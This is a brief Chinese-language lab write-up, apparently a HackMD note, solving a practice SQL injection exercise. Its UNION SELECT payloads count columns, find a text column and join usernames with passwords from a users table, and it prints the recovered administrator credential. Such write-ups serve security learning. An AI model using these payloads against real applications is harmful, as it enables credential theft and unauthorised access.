# Web SQL injection Lab10 一樣登入加攔截請求。   接著找出欄位數量,而且這次的題目需要測試哪個欄位可以顯示出文字。 ``` '+UNION+SELECT+NULL,NULL-- ```  ``` '+UNION+SELECT+'abc',NULL-- ```  ``` '+UNION+SELECT+NULL,'abc'-- ```  由於本題的考點是文字合併的技巧,所以我把使用者帳密合併起來並顯示在畫面上。 ``` '+UNION+SELECT+NULL,username||'~'||password+FROM+users-- ``` - `||'~'||`:合併兩字串  取得帳密並登入試試。 `administrator~rwt325xzi3r4ypoq7l3j` 
×
Sign in
Email
Password
Forgot password
or
By clicking below, you agree to our
terms of service
.
Sign in via Facebook
Sign in via Twitter
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Wallet (
)
Connect another wallet
New to HackMD?
Sign up